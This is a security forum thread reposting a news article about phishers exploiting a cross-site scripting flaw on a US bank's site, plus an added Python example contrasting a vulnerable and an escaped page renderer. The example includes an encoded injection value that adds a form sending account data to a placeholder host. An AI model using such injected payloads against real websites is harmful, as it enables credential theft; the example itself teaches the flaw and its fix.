Joined: Nov 2002
Posts: 1,146
Likes: 1
Ice Offline OP
UGN News Staff
Fraudsters have used a clever web-programming trick to turn a legitimate banking site into a tool for stealing account information.

Suntrust, a bank based in Georgia, US, has fallen foul of the deception, according to web security experts who received emails designed to swindle customers.

Researchers at UK-based web-monitoring firm Netcraft received emails claiming to come from Suntrust that ask customers to verify their account information using a link embedded in the message.

But the email was not sent from the bank's own servers and the web page it linked to contained extra characters in the URL address line - added on to the bank's legitimate web address. So, while the page was hosted by the bank's servers, hackers had overlaid it with altered elements to give the appearance of a legitimate "Account Verification" page.

Decoding these altered elements revealed a link to an alternative server controlled by the hackers. Customers entering their account information onto the overlaid page were inadvertently sending their details to be recorded by the hackers' web server.


Pass it on

Netcraft engineer Paul Mutton says the "phishing" trick is made worse because it exploits the bank's own site. "As far as the user is concerned, they are visiting a legitimate site," he says.

Known as a "cross-site scripting vulnerability" the trick allows an outsider to add to and alter a real web page with their own text and links. The problem can be exploited when the code used by the website operator - to process information for their web page - has not been written specifically to exclude outside, or untrusted, data.

"If you're web programming, you should really make sure data [entered in a URL] is sanitised," Mutton adds.

Since being informed by Netcraft, Suntrust has modified its site to prevent the trick working. Following a link from one of the phishing emails now produces a genuine web page.

Experts had previously warned that many sites could be vulnerable to cross-site scripting. A report released in September 2004 by UK computer security firm Next Generation Security (NGS) suggested that as many as nine out of 10 bank websites could be open to this type of flaw.

Source: New Scientist


Good artists copy, great artists steal.

-Picasso
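The article describes a reflected cross-site scripting flaw: data taken from the URL is copied into the bank's page without being sanitised, so an attacker can append markup that overlays a fake "Account Verification" form. The following is an added example, not code from the article, from Netcraft, or from SunTrust's site. It assumes a hypothetical page that greets the visitor by a `name` query parameter, shows the vulnerable renderer beside its hardened form (HTML-escaping the untrusted value), and includes a small check that counts form elements in the rendered output. The query string and the `example.invalid` host are constructed placeholders.

```python
# Added example (not from the New Scientist article or the forum post): a
# minimal server-side page renderer that reflects a URL query parameter into
# HTML, first with the flaw the article describes (untrusted URL data copied
# into the page unchanged), then hardened by escaping it.
from html import escape
from urllib.parse import parse_qs

# Hypothetical page template; "Account Verification" is the page title the
# phishing overlay imitated according to the article.
PAGE_TEMPLATE = """<html><body>
<h1>Account Verification</h1>
<p>Welcome back, {name}.</p>
<form action="/login" method="post">
  <input name="user"><input name="pass" type="password">
</form>
</body></html>"""

# Constructed sample: extra characters appended to an otherwise legitimate URL.
# Decoded, the 'name' value closes the paragraph and adds a second form whose
# action points at a placeholder third-party host (example.invalid).
SAMPLE_QUERY = (
    "name=%3C%2Fp%3E%3Cform%20action%3D%22https%3A%2F%2Fexample.invalid%2Fcollect%22%3E"
    "%3Cinput%20name%3Dacct%3E%3C%2Fform%3E%3Cp%3E"
)


def get_name(query_string: str) -> str:
    """Return the 'name' parameter from the query string, or a default."""
    params = parse_qs(query_string)
    return params.get("name", ["customer"])[0]


def render_unsafe(query_string: str) -> str:
    """Vulnerable: the URL parameter is dropped straight into the HTML, so any
    tags it carries become part of the page (reflected cross-site scripting)."""
    return PAGE_TEMPLATE.format(name=get_name(query_string))


def render_safe(query_string: str) -> str:
    """Hardened: HTML-escape the untrusted value first, so '<', '>', '"', "'"
    and '&' are emitted as text entities rather than interpreted as markup."""
    return PAGE_TEMPLATE.format(name=escape(get_name(query_string), quote=True))


def count_forms(page: str) -> int:
    """Count <form tags in a rendered page. The legitimate page has exactly one;
    a second one is the overlay the article describes. This is the kind of
    check a site owner can run against rendered output during testing."""
    return page.lower().count("<form")


if __name__ == "__main__":
    print("forms in vulnerable page:", count_forms(render_unsafe(SAMPLE_QUERY)))
    print("forms in hardened page:  ", count_forms(render_safe(SAMPLE_QUERY)))
```

With the sample query, the vulnerable renderer produces a page containing two forms, the second posting to the placeholder host; the hardened renderer produces one form and shows the injected text literally as `&lt;/p&gt;&lt;form ...`. Escaping at the point where untrusted data meets HTML is the sanitisation Mutton refers to, and it applies to every value read from the URL, not only the one shown here.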
Joined: Feb 2002
Posts: 7,203
Likes: 11
Community Owner
I've been getting these emails for years... It's sad though as I don't bank with them lol...


Donate to UGN Security here.
UGN Security, Back of the Web, and VNC Web Services Owner
